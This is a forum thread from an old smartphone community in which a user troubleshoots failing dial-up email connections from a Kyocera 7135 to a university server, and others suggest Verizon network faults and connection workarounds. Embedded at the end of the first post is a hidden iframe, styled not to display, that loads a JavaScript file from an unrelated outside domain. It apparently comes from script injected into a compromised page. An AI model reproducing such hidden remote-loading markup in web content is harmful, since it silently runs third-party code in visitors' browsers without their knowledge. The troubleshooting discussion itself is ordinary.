+ Reply to Thread
    wwk

E-mail Connection Problems

I've had very intermittent results with my attempts to log in to my corporate e-mail server with the 7135... sometimes it works, more often it doesn't... basic problem as follows:

Getting or fetching mail using an e-mail app starts the dialing process just fine and starts to connect, even does connect sometimes, but then I get an error message that says "retrying" or "canceling". (I know the server has a huge modem pool and I'm not getting busy signals.) Or, sometimes, when the connection is actually made to the network, the e-mail app doesn't seem to recognize that I'm connected to the network... the green light is on and I have an apparent data connection, but the e-mail app doesn't seem to know that. If I try to fetch again, presuming that I've actually connected, it tells me that the phone is busy.

I've tried three different e-mail apps (Eudora, Snapper (trial version) and Mobile Mail) and have the problem with all three. I'm presuming that my network connection information and servers etc. are ok, as it works sometimes, but sometimes doesn't.... but maybe I've missed something there.

Is there some technical element I'm not aware of? Do I need to mess around with timeouts or ports? I'm a bit afraid of getting in over my head. Thanks much.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I was having this problem two nights ago, and it was not a problem with the phone but a problem with Express Network (confirmed after calling Verizon). How often are you having this problem?

Alan

wwk
    I'm not using Express Network, just dial-up service from the 7135 to my coroporate network... and from what I understand (i.e., others dial in with no problem) the network and modems are fine.

I was having this problem two nights ago too, but I'm not on EN. So Verizon may have been having sporadic issues of different types.

I was able to get around it by shutting down all connections and all pieces of software, going into PDAPrefs and connecting directly (as opposed to going there from email or browser program), and then opening my email. Once it had established the connection directly, all my apps saw it. It felt like something on the network was confusing something on the phone, leaving my apps thinking they were sort of connected and sort of not; removing the apps from the connection loop allowed the phone to sort itself out. It also might help to power cycle the phone side, then go into PDAPrefs and connect.

It may still be the network. If you've had no problem dialing up in the past with your 7135, I'd wager it.

I've had the problem on a couple of occasions using ISPs which work fine from my workstation. VZW confirmed that the problem was due to their network. I thought the problem was with my phone before I got it sorted out. Here is the thread where I reported the incident:
    http://www.smartphonesource.com/vbul...3613#post53613

Moderators: VZW network problems are common and it does alarm those who are new to their 7135s, perhaps there should be a FAQ which explains this.
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

wwk
    The error message I get from within Snapper is as follows: "incorrect or busy phone number. Could not open the network library. Perhaps this device does not support network communications. Duration 7." I know that I'm using the right number and that it's not busy. Thanks for any help any of you can provide... I'm getting desperate.

wwk
    ... and using Mobile Mail, it cancels as well, with message that initially says its connecting to the ISP, then says "Unable to establish PPP connection." With Eudora, it simply cancels. With all three it sometimes actually apparently connects (i.e., I've got a call in progress to the server) but the programs don't recognize it, and when I try to fetch mail, it says the phone is busy. I'm stumped

@ wwk
    1. Can you connect to the internet via QNC? If not -- then resolve that first. Make sure that is working well. You might have to call the Verizon web group to help you get that going if the FAQ doesn't help. You are w/Verizon -- right?

If QNC works,
    2. Are you using an ISP? If so, try connecting via Pref-PDA/Network after verifying all of your settings. (Don't use a client.) After that, use Eudora Web to verify your connection is OK.

If you are not using an ISP and trying to get into your company's system directly, you might have to call your company's IT group for help. You might have a security issue. I know I can't get into my company's email system without starting another client.
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

wwk
    I'm sorry, but I don't know what you meand by QNC... and yes, I'm with Verizon.

wwk
    oops... hit reply too quickly. I'm at a university (notorious for lax security) and was able to directly dial in with the 6035, and on a few ocassions with the 7135... but lately, not at all.

Originally posted by wwk
    I'm sorry, but I don't know what you meand by QNC... and yes, I'm with Verizon.
    Check this out:
    http://www.smartphonesource.com/vbul...&threadid=5385

wwk
    Thanks, Beryl... I was able to connect using the VZW Quick 2 Net service... looks like that's the same as what was described in the thread you sent me... and was able to use the browser. My company acts as its own ISP (with a giant modem pool)... and I've been able to connect to it in the past, but VERY infrequently now... it just disconnects as I've described above. I also tried connecting through Prefs PDA/Network (i.e., w/o using a client) but no luck.